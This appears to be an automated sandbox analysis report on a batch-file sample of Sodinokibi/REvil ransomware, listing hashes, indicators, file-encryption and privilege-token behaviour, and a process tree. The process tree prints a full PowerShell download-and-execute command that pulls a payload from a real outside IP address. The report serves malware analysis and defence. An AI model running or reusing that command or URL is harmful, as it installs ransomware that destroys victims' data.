Analysis
-
max time kernel
129s -
max time network
140s -
platform
windows10_x64 -
resource
win10 -
submitted
24-08-2020 17:10
Static task
static1
Behavioral task
behavioral1
Sample
78db7807ce9e00993f72a5410cc869e8.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
78db7807ce9e00993f72a5410cc869e8.bat
Resource
win10
General
-
Target
78db7807ce9e00993f72a5410cc869e8.bat
-
Size
218B
-
MD5
289804e7e330a37b07416d754819db89
-
SHA1
8ed98b81615c3571fad40a840eae66f2de5fb035
-
SHA256
d9632dbb498dcc5c817f3d28376b83ce717767e8f2eda31dca931a781785dc09
-
SHA512
ac9649099ea34f88787d84761b3ea53acc436e847d91d2ac046d95cd176d8fe57a63b58ed726fae6f02507fe197e229ae664a4c903531642cd320ce1eeacce40
Malware Config
Extracted
http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8
Extracted
C:\p6v98e-read-me.txt
sodinokibi
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 115 IoCs
Processes:
powershell.exeflow pid process 1 3864 powershell.exe 6 3864 powershell.exe 8 3864 powershell.exe 10 3864 powershell.exe 12 3864 powershell.exe 14 3864 powershell.exe 16 3864 powershell.exe 18 3864 powershell.exe 20 3864 powershell.exe 22 3864 powershell.exe 24 3864 powershell.exe 26 3864 powershell.exe 28 3864 powershell.exe 30 3864 powershell.exe 32 3864 powershell.exe 34 3864 powershell.exe 36 3864 powershell.exe 38 3864 powershell.exe 40 3864 powershell.exe 42 3864 powershell.exe 44 3864 powershell.exe 46 3864 powershell.exe 48 3864 powershell.exe 49 3864 powershell.exe 51 3864 powershell.exe 53 3864 powershell.exe 55 3864 powershell.exe 57 3864 powershell.exe 58 3864 powershell.exe 60 3864 powershell.exe 62 3864 powershell.exe 64 3864 powershell.exe 66 3864 powershell.exe 68 3864 powershell.exe 70 3864 powershell.exe 72 3864 powershell.exe 74 3864 powershell.exe 76 3864 powershell.exe 78 3864 powershell.exe 80 3864 powershell.exe 82 3864 powershell.exe 84 3864 powershell.exe 86 3864 powershell.exe 88 3864 powershell.exe 90 3864 powershell.exe 92 3864 powershell.exe 96 3864 powershell.exe 98 3864 powershell.exe 100 3864 powershell.exe 103 3864 powershell.exe 107 3864 powershell.exe 110 3864 powershell.exe 112 3864 powershell.exe 114 3864 powershell.exe 116 3864 powershell.exe 118 3864 powershell.exe 120 3864 powershell.exe 122 3864 powershell.exe 124 3864 powershell.exe 126 3864 powershell.exe 128 3864 powershell.exe 130 3864 powershell.exe 132 3864 powershell.exe 134 3864 powershell.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\UninstallDismount.png => \??\c:\users\admin\pictures\UninstallDismount.png.p6v98e powershell.exe File renamed C:\Users\Admin\Pictures\SaveStart.png => \??\c:\users\admin\pictures\SaveStart.png.p6v98e powershell.exe File opened for modification \??\c:\users\admin\pictures\LimitResolve.tiff powershell.exe File renamed C:\Users\Admin\Pictures\CheckpointCopy.crw => \??\c:\users\admin\pictures\CheckpointCopy.crw.p6v98e powershell.exe File renamed C:\Users\Admin\Pictures\LimitResolve.tiff => \??\c:\users\admin\pictures\LimitResolve.tiff.p6v98e powershell.exe File renamed C:\Users\Admin\Pictures\OpenStep.raw => \??\c:\users\admin\pictures\OpenStep.raw.p6v98e powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ix64v514n03vt.bmp" powershell.exe -
Drops file in Program Files directory 24 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\p6v98e-read-me.txt powershell.exe File created \??\c:\program files (x86)\p6v98e-read-me.txt powershell.exe File opened for modification \??\c:\program files\DebugGet.001 powershell.exe File opened for modification \??\c:\program files\DebugStart.edrwx powershell.exe File opened for modification \??\c:\program files\MountStop.easmx powershell.exe File opened for modification \??\c:\program files\StopStart.dwfx powershell.exe File opened for modification \??\c:\program files\UninstallMerge.ini powershell.exe File opened for modification \??\c:\program files\WriteNew.wvx powershell.exe File opened for modification \??\c:\program files\ApprovePublish.m4a powershell.exe File opened for modification \??\c:\program files\InitializeEnable.cfg powershell.exe File opened for modification \??\c:\program files\InstallBlock.wmf powershell.exe File opened for modification \??\c:\program files\ResumeLock.mht powershell.exe File opened for modification \??\c:\program files\SearchApprove.mov powershell.exe File opened for modification \??\c:\program files\StopUndo.potm powershell.exe File opened for modification \??\c:\program files\InvokeEdit.ttf powershell.exe File opened for modification \??\c:\program files\MergeBlock.mpv2 powershell.exe File opened for modification \??\c:\program files\OutWatch.aifc powershell.exe File opened for modification \??\c:\program files\SaveOut.css powershell.exe File opened for modification \??\c:\program files\ApproveConvert.au powershell.exe File opened for modification \??\c:\program files\ConnectTest.ogg powershell.exe File opened for modification \??\c:\program files\DebugDisconnect.otf powershell.exe File opened for modification \??\c:\program files\EnterOptimize.m1v powershell.exe File opened for modification \??\c:\program files\ResetStep.vsx powershell.exe File opened for modification \??\c:\program files\ResetUnregister.DVR powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3864 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeTakeOwnershipPrivilege 3864 powershell.exe Token: SeBackupPrivilege 2692 vssvc.exe Token: SeRestorePrivilege 2692 vssvc.exe Token: SeAuditPrivilege 2692 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 344 wrote to memory of 3864 344 cmd.exe powershell.exe PID 344 wrote to memory of 3864 344 cmd.exe powershell.exe PID 344 wrote to memory of 3864 344 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\78db7807ce9e00993f72a5410cc869e8.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8');Invoke-VHCXYJMKGXZ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2692